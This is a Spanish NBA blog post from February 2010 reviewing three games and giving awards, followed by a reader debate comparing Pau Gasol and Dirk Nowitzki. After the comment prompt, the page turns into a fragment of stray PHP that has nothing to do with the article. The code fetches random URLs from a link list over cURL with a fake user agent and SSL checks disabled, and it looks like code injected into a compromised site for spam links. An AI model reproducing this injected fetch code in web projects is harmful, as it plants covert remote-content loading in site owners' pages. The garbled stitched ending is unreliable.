La Crónica (08/02/2010)

09 de February de 2010 por TheDeerHunter

Tan sólo 3 partidos… pero muy buenos partidos. Aquí vendría aquello de que lo bueno siempre se sirve en dosis pequeñas.

Pero antes de meternos en harina, una breve mención a la inclusión de Chris Kaman en lugar de Brandon Roy para disputar el All Star Game. Se hablaba de Monta Ellis, por aquello de la posición. Quizás por eso podría tener sus razones para lloriquear Ellis, como en su día hizo Kaman. De todas formas es muy posible que Kobe tampoco lo dispute, por lo que las posibilidades de Ellis vuelven a aumentar considerablemente. Todos contentos.

Sion que sirva de precedenten no exagera el Marca. Con Kobe y Bynum fuera de circulación Pau Gasol asumió galones. Nunca es fácil con Duncan en frente. Partido mastodóntico, rozando un triple doble camino del cuádruple. El resto del equipo jugando uno de los mejores choques a nivel colectivo de toda la temporada. Y en todo eso tuvo mucho que ver Pau y su manera de entender el liderazgo. No hay muchos jugadores en el mundo que puedan ejercerlo de esta forma.

Pero si lo de Pau fue impresionante, lo de Vince Carter fue alucinante. El veterano escolta destapó el tarro de las esencias. Ya no será ese animal que destrozaba el aro cada vez que lo intentaba. Anoche deslumbró de otro modo. Juego inteligente, fintas y lanzamientos de pura seda. Anoche sí estaba justificado que fuera él quien se jugara los tiros. Partidazo en toda regla, donde unos Hornets comandados por un genial Darren Collison pusieron el contrapunto perfecto a un toma y daca vibrante.

Pero no terminaba ahí la cosa. En un cartel donde aparezcan las siglas DAL vs GS no te vas a aburrir nunca. Terry, Josh Howard y Gooden formaron una inesperada tríada por un Nowitzki inexplicablemente apagado. Morrow-Ellis-Curry fueron una pesadilla en toda regla. Un juego exterior así sólo puede salir de la mente de un hombre.

PREMIOS

MVP: Jornada de grandes actuaciones individuales. Vince Carter, cuestionado en las últimas semanas, se fue a los 48 puntos y 7 rebotes, Jason Terry anotó 36 puntos, regaló 9 asistencias y capturó 6 rebotes y finalmente, Pau Gasol se quedó a 2 pasos del triples doble con 21 puntos, 19 rebotes, 8 asistencias y 5 tapones.

Rookie: Nos hemos cansado de decir que esta hornada de rookies, una de las peores de la historia decían, es una hornada de grandes bases. Anoche Stephen Curry anotó 25 puntos y repartió 9 asistencias mientras que Darren Collison, sigue disfrazado de Chris Paul y acabó su partido con 27 puntos anotados y 9 asistencias regaladas.

Sorpresa: En esta jornada de orgía anotadora sorprenden los 24 puntos y 10 rebotes de Drew Gooden, máximos de la temporada y los 14 -11 de Anthony Tolliver, uno de esos jugadores-sorpresa de Don Nelson.

Decepción: El alemán, Dirk Nowitzki, salió desde el banquillo en el pasado partido frente los Wolves y anoche disputó tan solo 28 minutos quedándose en 15 puntos. No es algo a lo que estemos acostumbrados.

Esfuerzo en vano: Entre los equipos que no consiguieron la victoria también pudimos contemplar grandes actuaciones. De todas ellas la más espectacular fue la de Anthony Morrow que anotó 33 puntos y capturó 11 rebotes. A su lado Monta Ellis se fue a los 27 y Stephen Curry a los 25. Y en los Hornets más de lo mismo: Stojakovic 29, Collison 27 y West, también 27.

Comenta

58 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Nadie dice que Gasol tenga un anillo porque pasase por allí, digo que ha ganado un anillo como escudero, la eficiencia sirve para medir en las fantasy pero no para medir la importancia de un jugador a la hora de conseguir un anillo. La eficiencia de Odom por 36 minutos es de 20.6 en los pasados play-offs y desde luego no me atreveria a compararle con Pau.

    En cuanto a la comparación con otros escuderos, es dificil ya que no hay muchos ejemplos de jugador interior escudero de un exterior. En las comparaciones con Kobe o Pippen sale perdiendo, en eficiencia y en el resto de números.

      Citar

  2. TheDeerHunter dice:
    #2

    La palabra escudero la utilizas a discreción… y en términos peyorativos que no tienen en absoluto que ver con la realidad. Además sin graduar… lo mismo es de escudero Pau que Sam Jones, sin anestesia… y ojo que hablo exclusivamente de GRANDES.
    Tengo muy claro que la eficiencia mide bastante más aproximadamente la importancia de cualquier jugador que un apreciación como la que das de la jerarquía de un equipo.
    Siempre me ha parecido de un absurdo supremo esa consideración cerril de que Kobe era escudero de Shaq. Era una relación simbiótica más que otra cosa y el threepeat no puede entenderse sin Kobe. Yo lo ví, nadie puede contármelo y no era en absoluto como se dice.

    Siguiendo esa argumentación, Bill Russell era escudero de Havlicek, Sam Jones o de cualquier otro; Nash ha sido escudero de Stat, Marion o cualquier otro… Magic y Kareem de Worthy ¿hasta Nowitzki fue escudero de Finley?? Eso no es así. El lanzar más a canasta no siempre significa ser el líder. Y sí hay muchos ejemplos de interiores escuderos de exteriores que también puedes comparar, ojo.
    Por ahí sí tengo claro que Nowitzki ha ejercido prácticamente siempre de líder de su equipo, pero no tengo tan claro que Pau haya sido escudero nunca de nadie… de hecho la prensa internacional ya destacó el año pasado la relación de igual a igual que había entre Pau y Kobe.

    Cambiando de tema, las fundidas que le dió el año pasado a Howard, o el año anterior a Duncan, Boozer… eso no aparece en ninguna tabla de eficiencia ni en ningún registro estadístico. Diría que no le he visto hacer a Nowitzki ninguna de esas… por eso casualmente siempre que destacamos a un jugador con dotes defensivas lo infravaloráis por decreto (excepto a Russell) Por ahí Pau también sale agraviado comparativamente.

    Ponderas las medias globales… y en efecto, no hay grandes diferencias en lo que te he comentado en favor de Pau pero las hay. Cualitativa y cuantitativamente. Al final a ti te da igual que haya apenas unas décimas de promedio en rebotes que hasta 4 como esta temporada. Gasol es mejor reboteador y las diferencias lejos de disminuir van aumentando… también es mejor pasador, taponador y defensor. Mucho mejor o mejor, tanto da.
    Nowitzki es mejor anotador, cierto… pero no por tanto como para ser indiscutible e incomparables como insinúas. Gasol ya le ha tocado demasiadas veces la cara individual y colectivamente como para afirmar eso tan categóricamente.

    En cualquier caso, trato de concluir. Creo que en una lista individual como la que hicimos seguiría poniendo a Nowitzki por delante y creo que posiblemente sí sea el mejor europeo de la historia, pero desde luego que NO si nos ciñéramos exclusivamente a este año. Y si Pau mantiene este nivel 3 o 4 años y caen 2-3 anillos más habría que revisar muy seriamente el criterio de quién es el mejor Europeo de todos los tiempos.

      Citar

  3. Love Denise dice:
    #3

    Gasol ha ganado un anillo como escudero, ¡¡como si eso fuera poco!!, además yo no lo llamaría escudero, lo llamaría más un segundo lider, no olvides, vivadirk, que tiene como lider a uno de los 10 mejores jugadores de la historia y al segundo mejor escolta de todos los tiempos. Por esa regla de tres,si Nowitzki fichara por los Lakers, también sería el escudero, no creo que le quitara los galones a Kobe. Para mí Si contamos desde la últiam década, los mejores “4” han sido Dunca, Garnett, Dirk y Gasol, por este orden, pero actualmente el mejor es Gasol con mucha diferencia.

      Citar

  4. Viva_Dirk dice:
    #4

    Bueno, pues finalmente llegamos a estar deacuerdo en bastantes cosas. Yo no utilizo la palabra escudero en tono peyorativo, la utilizo porque creo que es perfecta para el papel que hace Pau en los Lakers, ser escudero o 2º espada de un equipo aspirante a algo serio no es nada facil, lo hemos visto con Odom, con Josh Howard o con Carter esta misma campaña; por ahí yo no le quito ningun mérito a Gasol.

    En cuanto a que la eficiencia mida mas la importancia de un jugador, la media de Nowitzki es de 24.34 y eso que incluye el 7 de su primer año. La de Gasol es de 22.33, siendo peor en todo menos en anotación no se como le lo habrá montado. Y este año la diferencia es de 0.5.

    En cuanto a lo de defensor, Gasol JAMAS ha sido un gran defensor, lo ha sido en los 2 últimos años en momentos concretos, ni mas ni menos. En terminos como agresividad y dureza Nowitzki siempre ha estado por encima. Y ojo que coincido contigo en que la defensa que le hizo a Howard o a Boozer no salen en ninguna estadística y son cosas que nunca ha hecho Nowitzki, como tampoco Gasol ha dado las exhibiciones ofensivas en play-offs del aleman.

    Y para terminar, los títulos, galardones, etc, sirven para dictaminar como de exitosa ha sido la carrera de alguien, pero nunca servirán para medir la calidad individual de uno u otro jugador, el dia en que eso sea así se acabarán las opiniones.

      Citar

  5. max dice:
    #5

    Yo creo que más allá de los numeros y de la estadística, que reflejan muchas cosas, lo que aporta Gasol es mucho intangible. Cuando Gasol fue traspasado a los Lakers, ahora hace dos años, éstos iban sextos o séptimos en la Conferencia Oeste, sin mucho margen de mejora y despues de dos o tres años muy malos. Fue llegar Gasol a LA Lakers y el equipo empezar a subir puestos en su conferencia hasta llegar a las finales el primer año y ganarlas el segundo. Creo que se puede decir que Gasol ha hecho campeón a LA, aportando cosas que muy pocos jugadores en el mundo pueden aportar: el intangible.

      Citar

  6. Viva_Dirk dice:
    #6

    Cuando Gasol llegó a LA, aquellos Lakers ya habian liderado la conferencia Oeste ese mismo año.

      Citar

  7. kantonyo dice:
    #7

    Sólo los mas grandes pueden hacer lo que ha hecho Gasol. Venir de una franquicia menor como los Grizzlies con unos números, y ser traspasado a Lakers, con jugadores como Bryant, Odom y Bynum, y conseguir los mismos promedios o mejorarlos. En esto del baloncesto 2+2 no son 4, todos apostabamos a que Gasol iba a bajar en su rendimiento cuando llegará a LA, pero ahi estan los hechos. Ya me gustaria a mi ver a Dirk llegando a Lakers o a Cavs y seguir con sus números. Sobre todo Dirk que su juego se basa en si mismo y que para eso ya estaría Kobe o LeBron. Y ya me gustaria a mi haber visto a Dirk con los Grizzlies, los hubiera llevado a las finales?? dudo incluso que hubiera estado en PO.

    No sé si un equipo: PG – Stackhouse/Harris – SG – Terry – SF – J.Howard – PF – P.Gasol – C – Dampier, hubiera llegado a las finales de la NBA, pero si sé que ese equipo Gasol no lo tuvo nunca en Memphis.

    Los Grizzlies han sido siempre una panda, han sido lo peor que le ha podido pasar a Pau Gasol en su brillante trayectoria deportiva. Battier, Dickerson, Posey, , Gay …. joder si es que ninguno de los jugadores que pasaron por alli hubiera sido titular en ninguna franquicia aspirante a algo.

    Y sigo pensando que Dirk ha sido mejor jugador que Pau, pero no por meritos de cada uno, sino por mala suerte del español al estar en Memphis tantos años comiendose los mocos. Pero como he dicho antes, Pau no ha tocado techo.

    Playoffs 2005-2006

    Mavs: PG : Stackhouse/Harris – SG – J. Terry – SF – J .Howard – PF – D. Nowitzki – C – E. Dampier
    Grizz : PG – Ch. Atkins – SG – E. Jones – SF – S. Battier/Miller – PF – P. Gasol – C – L. Wright

    Sólo hay que cambiar a Pau y a Dirk de un equipo a otro y ver la diferencia. A tiempo pasado no hay duda del merito de Pau de llevar a esa franquicia a Playoffs, incluso más que de hacer a Lakers campeón con Phil, Kobe, Odom y Bynum.

      Citar

  8. TheDeerHunter dice:
    #8

    Bueno… sí, como diría cierto “Toro” que conocí algún día, los Lakers fueron líderes de conferencia Oeste ese mismo año. Y [mode ironic: on] toooodos los aficionados amarillos estábamos absolutamente convencidos de que ese año llegábamos a la final con ese equipo. En realidad Pau Gasol no tuvo nada que ver en eso. [mode ironic: off]

    Con respecto al nivel defensivo de Gasol… pues te diré que muchos no esperábamos que pudiera alcanzar el nivel que finalmente ha alcanzado (a años luz de otros…) pero creo que lo de que JAMAS ha sido un gran defensor incurre en el tópico y la etiqueta que le colgaron. Su gran problema ha sido jugar en una posición que no era la suya, la motivación competitiva del equipo que le había tocado en suerte y… lo pardillo/generoso que ha sido siempre.
    Antes él cerraba el rebote y el Lorenzen de turno se lo apuntaba. Ahora él es el que impone jerarquía para recoger rebotes que le facilitan otros. Antes salía a las ayudas y a él no le ayudaba ni dios.
    Es el efectismo en la NBA… muchas veces más importante para la opinión pública que la aportación real. Lo hemos visto en taaaantos jugadores.

    Para mí sólo por constitución física y descontando la actitud de Dirk (que siempre ha sido muy buena, aunque JAMÁS ha sido un perro de presa) SIEMPRE ha sido mejor defensor Gasol. Ahora mismo son incomparables en ese sentido.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>